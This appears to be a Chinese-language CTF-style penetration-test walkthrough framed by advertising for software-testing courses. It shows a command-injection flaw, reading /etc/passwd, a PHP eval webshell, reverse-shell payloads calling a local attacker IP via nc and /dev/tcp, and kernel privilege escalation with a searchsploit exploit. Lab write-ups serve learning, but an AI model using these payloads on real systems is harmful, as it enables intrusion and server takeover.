既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
这里可以知道目标开启了21和80端口,分别是ftp服务和Apache服务
三、web渗透
1、漏洞发现
开启了80端口,部署的是Apache服务,先去访问一下web服务,看是否有漏洞
在一个页面找到一个url地址存在参数,页面为空白,参数未被赋值,猜测可能是代码执行漏洞或者命令执行漏洞,经过探测发现是命令执行漏洞。
2、漏洞利用
cat /etc/passwd
通过linux命令查看其账号密码
虽然获取了文件内容,但是无法直接登录。既然可以执行linux命令,尝试写一句话木马直接getshell
echo '<?php @eval($_POST['shell']);?>' >> getshell.php
这里介意使用post方法,get方法蚁剑无法连接
蚁剑连接
连接成功
收集信息,扩大战果
找到两个密码,但是并没有找到flag,应该值root目录,我们现在没有权限,尝试反弹shell,查看系统版本,使用系统内核漏洞提权
3、反弹shell
使用蚁剑新建一个php文件,写一个反弹shell在PHP文件里,使用kali监听对于端口,然后访问该文件,即可反弹shell
nc -lvp 443
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.11 443 >/tmp/f');?>
<?php system('bash -i > /dev/tcp/192.168.0.11/443 0>&1 2>&1')?>
不知道为啥bash反弹不能使用
访问该文件
反弹成功
切换完整的交互式bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
四、权限提升
1、查看系统版本
uname -a
2、根据系统版本提权
searchsploit ubuntu 4.4.0
3、采用45010.c这个文件进行提权
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!